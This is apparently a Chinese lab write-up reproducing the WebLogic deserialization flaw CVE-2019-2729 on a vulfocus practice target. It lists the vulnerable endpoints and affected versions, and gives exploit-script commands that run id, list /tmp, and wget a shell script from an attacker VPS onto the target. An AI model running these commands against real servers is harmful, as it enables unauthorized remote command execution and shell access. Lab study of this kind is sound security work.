@[TOC](weblogic 反序列化 (CVE-2019-2729))
所有文章,仅供安全研究与学习之用,后果自负!
weblogic 反序列化 (CVE-2019-2729)
0x01 漏洞描述
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 CVE-2019-2729漏洞是对CVE-2019-2725漏洞补丁进行绕过,形成新的漏洞利用方式,属于CVE-2019-2725漏洞的变形绕过。与CVE-2019-2725漏洞相似,CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意HTTP请求,用于获得目标服务器的权限,并在未授权的情况下执行远程命令,最终获取服务器的权限。
该漏洞本质是由于 wls9-async组件在反序列化处理输入信息时存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。
7001端口
影响组件:
wls9_async_response.war
wls-wsat.war
漏洞url为
url:port/_async/AsyncResponseService
0x02 影响范围
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
0x03 漏洞复现
vulfocus靶场
(1)访问下边的url地址 可以 访问 可能存在漏洞
http://118.193.36.37:44829/_async/AsyncResponseService
(2) 漏洞利用地址
/wls-wsat/CoordinatorPortType
抓包访问
贴入如下 请求包 修改target 和conmmand即可
工具
工具地址:
https://github.com/ruthlezs/CVE-2019-2729-Exploit
(1) 查看用法
python oracle-weblogic-deserialize.py -h
(2) 执行id命令
python oracle-weblogic-deserialize.py -u http://118.193.36.37:63126/ -c id
(3) 获取flag(如果报错timeout 多尝试几次)
python oracle-weblogic-deserialize.py -u http://118.193.36.37:63126/ -c "ls /tmp"
(4) 下载攻击vps上 连接shell的 cmd.sh文件 到指定tmp目录
python oracle-weblogic-deserialize.py -u http://118.193.36.37:63126/ -c "wget http://X.X.X.X/cmd.sh -P /tmp"
(5) 看是否下载成功
python oracle-weblogic-deserialize.py -u http://118.193.36.37:63126/ -c "ls /tmp"
(6)赋予执行权限 后运行 cmd.sh 连接失败
ls -l /tmp 命令 没有执行成功 不知道赋权失败 还是 执行cmd.sh失败
0x04 漏洞修复
打补丁